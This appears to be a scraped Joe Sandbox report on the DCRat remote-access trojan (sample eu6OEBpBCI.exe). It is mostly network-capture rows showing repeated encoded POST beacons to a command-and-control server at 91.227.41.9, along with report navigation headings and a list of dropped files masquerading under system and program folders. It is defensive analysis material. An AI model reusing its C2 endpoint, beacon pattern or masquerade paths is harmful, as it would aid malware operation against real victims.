Dec 9, 2024 00:27:32.827641964 CET	2536	OUT	Data Raw: 5c 59 46 57 5d 43 50 5f 54 57 5b 51 55 5f 59 55 50 52 5a 59 56 51 57 5b 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: \YFW]CP_TW[QU_YUPRZYVQW[X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_$&.9+?#S<<%0?#<4\7?!#3+) ]"2'*/&\"'Z,
Dec 9, 2024 00:27:33.740979910 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:33.973172903 CET	151	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:33 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:34.209474087 CET	238	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2532 Expect: 100-continue
Dec 9, 2024 00:27:34.562031031 CET	2532	OUT	Data Raw: 5c 5c 43 52 58 4b 55 52 54 57 5b 51 55 58 59 55 50 53 5a 5e 56 51 57 58 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: \\CRXKURTW[QUXYUPSZ^VQWXX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_$32=$^ 6$(%-_'?);7,53 +,_68(/&\"'Z,
Dec 9, 2024 00:27:35.476969004 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:35.709336042 CET	151	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:35 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report eu6OEBpBCI.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\MSECache\OfficeKMS\win8\74cb7468389f91

C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe

C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe:Zone.Identifier

C:\Program Files\7-Zip\Lang\74cb7468389f91

C:\Program Files\7-Zip\Lang\aVIegkftDeblliEdgtUahRSaMtI.exe

C:\Program Files\7-Zip\Lang\aVIegkftDeblliEdgtUahRSaMtI.exe:Zone.Identifier

C:\Recovery\5b884080fd4f94

C:\Recovery\fontdrvhost.exe

C:\Recovery\fontdrvhost.exe:Zone.Identifier

C:\Users\Public\Libraries\5940a34987c991

Windows Analysis Report
eu6OEBpBCI.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:35.965714931 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:36.312043905 CET	2536	OUT	Data Raw: 59 59 43 5d 5d 47 50 58 54 57 5b 51 55 59 59 5b 50 58 5a 59 56 5c 57 5b 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: YYC]]GPXTW[QUYY[PXZYV\W[X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_$'.1+X 5+-3<7W()07:$53$<*?#!0[(&\"'Z,,
Dec 9, 2024 00:27:37.234688044 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:37.489696026 CET	207	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:37 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:37.723239899 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:38.077508926 CET	2536	OUT	Data Raw: 59 58 43 54 5d 44 50 5c 54 57 5b 51 55 50 59 5a 50 5c 5a 58 56 5d 57 59 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: YXCT]DP\TW[QUPYZP\ZXV]WYX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'&.%X<(Z7'Z<C%&<$+##\'T!#/)),\!/+&\"'Z,

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:38.571013927 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 1860 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:38.921875954 CET	1860	OUT	Data Raw: 59 5e 43 52 58 44 55 5b 54 57 5b 51 55 5d 59 54 50 5f 5a 5d 56 5c 57 52 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: Y^CRXDU[TW[QU]YTP_Z]V\WRX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_$&=9=)#?&&$/W(9$X!)4# ?+$\5<^?&\"'Z,<
Dec 9, 2024 00:27:39.870912075 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:40.105581999 CET	380	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:39 GMT Server: Apache/2.4.58 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0f 13 39 57 26 36 3f 1d 2a 0d 04 0a 3f 5a 27 15 39 2c 2f 01 3f 0e 35 1c 25 58 3f 11 26 5e 31 0d 3f 10 38 01 33 1c 31 52 30 34 28 0d 2a 02 2f 58 07 1c 27 5c 2b 38 20 03 24 23 00 5e 3d 22 2c 01 31 03 24 14 27 3e 05 01 27 1d 24 5b 3c 55 3e 0b 32 3b 3a 08 2b 05 0d 02 2e 34 2f 0f 21 0e 23 53 08 11 25 56 27 31 37 02 32 06 3c 5a 21 0a 39 0f 27 3b 3f 1c 3d 3c 01 02 28 23 0c 02 2a 21 26 1e 24 0c 2f 0e 27 59 34 59 30 33 3e 50 25 2a 26 54 2a 00 23 56 03 31 57 50 Data Ascii: 9W&6??Z'9,/?5%X?&^1?831R04(/X'\+8 $#^=",1$'>'$[<U>2;:+.4/!#S%V'172<Z!9';?=<(#!&$/'Y4Y03>P%&T*#V1WP

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:38.693223000 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:39.046348095 CET	2536	OUT	Data Raw: 59 5b 46 56 5d 41 50 5c 54 57 5b 51 55 50 59 5b 50 5b 5a 58 56 53 57 5d 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: Y[FV]AP\TW[QUPY[P[ZXVSW]X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'3=%<)75(?6234+) *<6??_<^5(_+/&\"'Z,
Dec 9, 2024 00:27:40.024805069 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:40.257663965 CET	207	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:39 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:40.490586042 CET	238	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue
Dec 9, 2024 00:27:40.843182087 CET	2536	OUT	Data Raw: 59 5c 43 54 58 41 55 59 54 57 5b 51 55 59 59 5b 50 58 5a 5b 56 52 57 5a 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: Y\CTXAUYTW[QUYY[PXZ[VRWZX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'['-+"6'Y(C%\3/ ?_8Z49#T!<Q)9'!! _??&\"'Z,,
Dec 9, 2024 00:27:41.772653103 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:42.035217047 CET	151	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:41 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:42.269382954 CET	238	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue
Dec 9, 2024 00:27:42.624428034 CET	2536	OUT	Data Raw: 59 58 46 51 58 44 50 5b 54 57 5b 51 55 5b 59 5b 50 53 5a 50 56 53 57 5b 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: YXFQXDP[TW[QU[Y[PSZPVSW[X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'X3>.(,_#%++='/+(4 :'Q5?(*;#!$[<?&\"'Z,$
Dec 9, 2024 00:27:43.550786018 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:43.785527945 CET	151	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:43 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:44.021748066 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:44.374555111 CET	2536	OUT	Data Raw: 59 5d 46 57 58 44 55 5b 54 57 5b 51 55 5e 59 55 50 5e 5a 51 56 57 57 5e 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: Y]FWXDU[TW[QU^YUP^ZQVWW^X_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'Z$)Y+:$7'X?5-^0W<)37\#!<P+96,_*/&\"'Z,0

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:45.231050014 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 1860 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:45.577569962 CET	1860	OUT	Data Raw: 5c 59 46 56 5d 46 55 5d 54 57 5b 51 55 51 59 5f 50 52 5a 50 56 5d 57 52 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: \YFV]FU]TW[QUQY_PRZPV]WRX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_''>1+9Z#& ?"0 )*$Y7"V3<86",<&\"'Z,
Dec 9, 2024 00:27:46.542615891 CET	405	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 30 38 20 44 65 63 20 32 30 32 34 20 32 33 3a 32 37 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 32 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 0f 13 39 1c 26 36 20 06 3d 33 3a 09 28 02 33 5f 3a 59 2f 05 3c 30 21 5e 32 10 38 0b 32 2b 29 0f 3f 07 27 59 30 21 2e 0e 30 34 2c 0f 3e 02 2f 58 07 1c 27 1f 3e 2b 2f 5b 32 1d 3e 1b 3d 32 33 5c 31 04 37 02 27 2e 38 1e 26 23 2b 02 2b 33 25 11 26 3b 22 0a 28 38 2b 07 2d 27 0e 54 22 34 23 53 08 11 25 50 33 32 3f 02 32 01 34 5f 36 0d [TRUNCATED] Data Ascii: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 23:27:46 GMTServer: Apache/2.4.58 (Ubuntu)Vary: Accept-EncodingContent-Length: 152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-89&6 =3:(3_:Y/<0!^282+)?'Y0!.04,>/X'>+/[2>=23\17'.8&#++3%&;"(8+-'T"4#S%P32?24_6P']#T)Z8Y?=Y(!9'#$<<Y&01%&T#V1WP

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:45.351223946 CET	262	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 9, 2024 00:27:45.702629089 CET	2536	OUT	Data Raw: 59 5a 43 56 5d 44 55 5c 54 57 5b 51 55 51 59 5d 50 5e 5a 58 56 57 57 58 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: YZCV]DU\TW[QUQY]P^ZXVWWXX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_'Y&=%=9(4S+?%)[$Y4)94]4)#!,U()?!<?/&\"'Z,
Dec 9, 2024 00:27:46.637933969 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:46.873531103 CET	207	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:46 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 00:27:47.116477966 CET	238	OUT	POST /imagePipepolldletemp.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 91.227.41.9 Content-Length: 2536 Expect: 100-continue
Dec 9, 2024 00:27:47.468242884 CET	2536	OUT	Data Raw: 5c 5b 43 55 58 46 55 5a 54 57 5b 51 55 5a 59 5f 50 5a 5a 5d 56 56 57 58 58 5f 5d 56 5e 5d 54 5c 47 5b 51 54 59 53 5b 57 5c 52 55 5c 52 5a 50 5f 51 50 58 59 42 5a 59 50 5d 56 51 5d 54 50 5c 5f 5b 5c 42 58 5a 5f 5a 5d 5a 52 5e 5b 47 56 5f 5f 5e 5d Data Ascii: \[CUXFUZTW[QUZY_PZZ]VVWXX_]V^]T\G[QTYS[W\RU\RZP_QPXYBZYP]VQ]TP\_[\BXZ_Z]ZR^[GV__^]_QUZV]VPZ\ZTYQ^[_VZV[Y^Z^_\^YSYWYQQZ^YVQ[ZSW]W\R^_Y\^\ZVTPXQYVU[ZYVQT_BRYSX@SVY\[X^PWWW^^_P_T_X[\QGQU_$0%\?,_#5+[(&-0,+4Y +5?</#28^<&\"'Z,
Dec 9, 2024 00:27:48.385843992 CET	25	IN	HTTP/1.1 100 Continue
Dec 9, 2024 00:27:48.621589899 CET	151	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 23:27:48 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3d 5b 40 58 Data Ascii: =[@X